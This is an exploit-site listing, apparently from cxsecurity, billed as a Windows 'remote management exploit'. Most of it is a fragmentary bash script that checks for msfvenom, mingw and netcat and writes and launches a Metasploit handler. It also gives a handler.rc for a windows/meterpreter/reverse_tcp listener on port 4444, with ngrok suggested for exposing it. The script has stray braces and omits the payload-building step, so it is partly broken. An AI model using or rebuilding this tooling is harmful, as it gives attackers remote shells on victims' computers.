Windows x32-x64 MSFVenom TCP/80-4444 Remote Management Exploit

2020.06.21
tr Gaddar (TR) tr
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

#Author : Gaddar #Team : SiyahBayrak Turkish Vulnerability Researchers #Video : https://youtu.be/oPBI0ELz44g #Note : I used the CatchYou software in the video. It can also be exploited without software. #Tested on Kali Linux 2020.2 #Payload Tested on Win10 x64 and Win7 x64 #Instagram : @pt.php Exp; command -v msfvenom > /dev/null 2>&1 || { echo >&2 ;exit 1; } command -v i686-w64-mingw32-gcc > /dev/null 2>&1 || { echo >&2; exit 1; } command -v base64 > /dev/null 2>&1 || { echo >&2; exit 1; } command -v zip > /dev/null 2>&1 || { echo >&2; exit 1; } command -v netcat > /dev/null 2>&1 || { echo >&2; exit 1; } Requirements; Ngrok or other dns services. (https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip) - For amd64 Netcat : "nc [options] 127.0.0.1 4444" Metasploit Framework; default_listr="Y" read -p $'\n\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Start Metasploit Listener? \e[0m\e[1;77m[Y/n]\e[0m\e[1;33m: \e[0m' listr listr="${listr:-${default_listr}}" if [[ $listr == Y || $listr == y || $listr == Yes || $listr == yes ]]; then printf "use exploit/multi/handler\n" > handler.rc printf "set payload %s\n" $payload_msf >> handler.rc if [[ $forward == true ]];then printf "set LHOST 127.0.0.1\n" >> handler.rc else printf "set LHOST %s\n" $server_tcp >> handler.rc fi printf "set LPORT %s\n" $server_port >> handler.rc #printf "set ExitOnSession false\n" >> handler.rc #printf "exploit -j -z\n" >> handler.rc printf "exploit\n" >> handler.rc msfconsole -r handler.rc rm -rf handler.rc fi fi } Note : Handler.rc on CatchYou Handler.rc; use exploit/multi/handler set payload windows/meterpreter/reverse_tcp [default] set LHOST 127.0.0.1 set LPORT 4444 exploit


Vote for this issue:
25%
75%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top